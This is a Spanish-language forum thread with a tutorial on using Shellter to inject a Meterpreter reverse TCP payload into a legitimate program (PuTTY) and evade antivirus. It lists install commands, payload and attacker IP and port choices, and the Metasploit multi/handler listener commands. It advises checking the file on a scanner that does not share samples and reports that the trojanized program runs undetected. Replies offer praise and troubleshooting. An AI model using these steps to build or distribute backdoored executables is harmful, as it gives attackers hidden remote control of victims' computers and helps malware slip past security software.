Evadiendo Antivirus con Shellter

Iniciado por LionSec, Julio 13, 2015, 04:32:00 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Julio 13, 2015, 04:32:00 PM Ultima modificación: Agosto 07, 2015, 09:43:18 PM por Gabriela
Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación .

Para más información visita : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Instalación

Lo primero que haremos es descargarlo desde su página oficial (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

Código: bash
apt-get update
apt-get install shellter

Instalación en backbox

Primero hay que agregar los repositorios :

Código: bash
nano /etc/apt/sources.list


Añadimos las siguientes entradas :

Código: php
deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main


Código: bash
apt-get update
apt-get install shellter


Instalación en Arch Linux :

Código: bash
yaourt -Syy
yaourt -S aur/shellter



En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A) .



Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .



Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurarlo manualmente .

Vamos a teclear (L)



Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .



Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado




:) :)

OK , sólo nos queda configurar el "listener" .

Código: php
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit




En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .



Demo


Bueno amigos , eso ha sido todo . Espero que le sirva a más de uno .

Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos

excelente aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
excelente aporte @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , espero que te sirva

Hola buenas tardes, primero que todo muy buen aporte; muchas gracias.
Tengo un problema:
- Cuando llego a la parte de seleccionar los payloads no se muestra ninguno, queda en Select payload... Pero no se muestra ningun payload a seleccionar.
Me podrian ayudar por fa?

Gracias

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, mmm que OS usas??, yo usé Kali v1 y funcionó perfecto, eso si que tube que instalar el Wine, y eso que no se muestren los payloads... prueba iniciando la DB con #service postgresql start y prueba el shellter.

documentacion de kali: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
espero por ayudarte.

Saludos.
Vector  ;D

Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Se mas especifico para poder ayudarte, que tipo de error te da.